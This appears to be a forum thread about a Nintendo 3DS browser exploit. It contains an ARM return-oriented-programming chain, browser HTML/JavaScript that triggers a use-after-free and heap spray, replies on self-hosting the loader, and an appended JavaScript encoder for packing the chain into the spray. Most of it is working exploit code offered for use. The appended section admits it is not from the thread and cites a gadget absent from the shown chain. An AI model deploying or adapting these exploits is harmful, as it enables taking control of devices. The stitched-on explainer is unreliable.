.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@sleep for a bit
.word 0x0010C320 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228B10 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0010420C @ svc 0xa | bx lr
@ needed for ROP
.word 0x0010C320 @ pop {r0, pc}
.word SPIDER_ROP_LOC+0x8C @ r0 InitData 1
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0012A3D4 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B5C @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word SPIDER_ROP_LOC @ r9 (needed for rop) InitData 2
.word 0x001057E0 @ r10 (needed for rop) InitData 3
.word 0x001057E0 @ POP {PC} (needed for rop) InitData 4
@flush data cache
.word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012C228 @ GSPGPU_FlushDataCache
@ needed for ROP
.word 0x0010C320 @ pop {r0, pc} (needed for rop) InitData 5
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop) InitData 6
@send GX command
.word 0x0010C320 @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228B10 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF @source address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC @source address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dlplay from spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF @source address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
myself:
.word SPIDER_ROP_LOC+myself @ Self 1
.word 0x001057E0 @ Self 2
.fill 7, 4, 0xDEADC0DE
.word 0x0013038C @ Self 3
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3 @ r1 = thread-local storage pointer
add r1, #0x80 @ IPC command buffer lives at TLS+0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
@sleep forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
How do I host this on my own web server so I don't have to go to loadcode.projectpokemon.org?

Do you mean via your computer or on an external server? If you don't know how to port forward, I suggest 00webhost. You can upload the index and frame .HTMLs to the server, and test it as you please.

All that's needed for this is a frame and index.html? That's simple. Where can I get these files?
<html>
<head>
<script>
var nb = 0;
// Fires twice for the <object> below: the first time it arms the parent's
// DOMSubtreeModified handler (dsm, defined in index.html), the second time
// it removes this iframe from its parent.
function handleBeforeLoad() {
if (++nb == 1) {
p.addEventListener('DOMSubtreeModified', parent.dsm, false);
} else if (nb == 2) {
p.removeChild(f);
}
}
// Runs once this frame has loaded: remember the iframe and its parent node,
// then insert an <object> whose beforeload events drive the sequence above.
function documentLoaded() {
f = window.frameElement;
p = f.parentNode;
var o = document.createElement("object");
o.addEventListener('beforeload', handleBeforeLoad, false);
document.body.appendChild(o);
}
window.onload = documentLoaded;
</script>
</head>
<body>
KEKEKEKEK...
</body>
</html>
<html>
<head>
<style>
body {
color:white;
background:black;
}
</style>
<script>
// Build a text node from the payload (each copy followed by 0xcccc) and keep
// it referenced in `mem` so it stays allocated.
function magicfun(mem, size, v) {
var a = new Array(size - 20);
nv = v + unescape("%ucccc");
for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
mem.push(t);
}
// DOMSubtreeModified handler registered by frame.html; sprays text nodes of
// increasing size once the iframe is removed.
function dsm(evnt) {
var mem = [];
for (var j = 20; j < 430; j++) {
// YOUR PAYLOAD HERE: the ROP chain as a %uXXXX escape string
magicfun(mem, j, unescape("YOUR PAYLOAD HERE"));
}
}
</script>
</head>
<body>
<h1 align="center">LOADING ROP...</h1>
<iframe width=0 height=0 src="frame.html"></iframe>
</body>
</html>
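To fill the unescape("YOUR PAYLOAD HERE") slot in index.html you need the assembled ROP chain as %uXXXX escapes. What follows is an added example, not code posted in this thread and not part of Spider3DSTools: it serialises 32-bit .word values little-endian, emits them as %uXXXX units, and decodes the string back through the same unescape() the loader calls, so the word layout can be checked before it is pasted into the page. It assumes, which the thread does not state, that the browser keeps the sprayed text as UTF-16LE, so each %uXXXX unit lands as two little-endian bytes and 0x0010b5b4 has to be written as %ub5b4%u0010. SAMPLE_WORDS is constructed here from the first gadget of the posted chain purely for illustration.

```javascript
// Added example (not from the thread): encode an assembled spider ROP chain
// as the %uXXXX escapes the loader's unescape("YOUR PAYLOAD HERE") expects,
// and decode it back to verify the layout.
//
// Assumption (not stated on the page): the text node is stored as UTF-16LE,
// so one %uXXXX unit = two little-endian bytes in memory.

function hex4(n) {
  return n.toString(16).padStart(4, '0');
}

// Little-endian serialisation of 32-bit words (what .word emits on ARM).
function wordsToBytes(words) {
  const out = new Uint8Array(words.length * 4);
  words.forEach((w, i) => {
    out[4 * i] = w & 0xff;
    out[4 * i + 1] = (w >>> 8) & 0xff;
    out[4 * i + 2] = (w >>> 16) & 0xff;
    out[4 * i + 3] = (w >>> 24) & 0xff;
  });
  return out;
}

// Bytes -> "%uXXXX%uYYYY..." with one UTF-16 code unit per byte pair.
// An odd trailing byte is padded with 0x00 rather than silently dropped.
function bytesToUnicodeEscapes(bytes) {
  const src = bytes.length % 2 ? new Uint8Array([...bytes, 0]) : bytes;
  let s = '';
  for (let i = 0; i < src.length; i += 2) {
    s += '%u' + hex4(src[i] | (src[i + 1] << 8));
  }
  return s;
}

// Inverse: run the same unescape() the loader uses, then split each code
// unit back into two little-endian bytes.
function unicodeEscapesToBytes(escaped) {
  const str = unescape(escaped);
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const cu = str.charCodeAt(i);
    out[2 * i] = cu & 0xff;
    out[2 * i + 1] = cu >>> 8;
  }
  return out;
}

// Reassemble 32-bit words; a chain that is not word-aligned is a build error.
function bytesToWords(bytes) {
  if (bytes.length % 4) throw new Error('ROP chain is not word-aligned');
  const words = [];
  for (let i = 0; i < bytes.length; i += 4) {
    words.push((bytes[i] | (bytes[i + 1] << 8) | (bytes[i + 2] << 16) | (bytes[i + 3] << 24)) >>> 0);
  }
  return words;
}

// Constructed sample: the pop {r0-r4,pc} gadget address and SPIDER_GSPHEAPBUF
// from the first posted chain, followed by two filler words.
const SAMPLE_WORDS = [0x0010b5b4, 0x18370000, 0xdeadc0de, 0xdeadc0de];

function encodeChain(words) {
  return bytesToUnicodeEscapes(wordsToBytes(words));
}

function decodeChain(escaped) {
  return bytesToWords(unicodeEscapesToBytes(escaped));
}

if (typeof require !== 'undefined' && require.main === module) {
  // For a real chain: bytesToUnicodeEscapes(require('fs').readFileSync('rop.bin'))
  console.log(encodeChain(SAMPLE_WORDS));
}
```

For a real build, pass the bytes of the objcopy -O binary output to bytesToUnicodeEscapes and paste the returned string in place of YOUR PAYLOAD HERE; running decodeChain on that string first and comparing it against the .word listing catches byte-order mistakes before anything is sprayed.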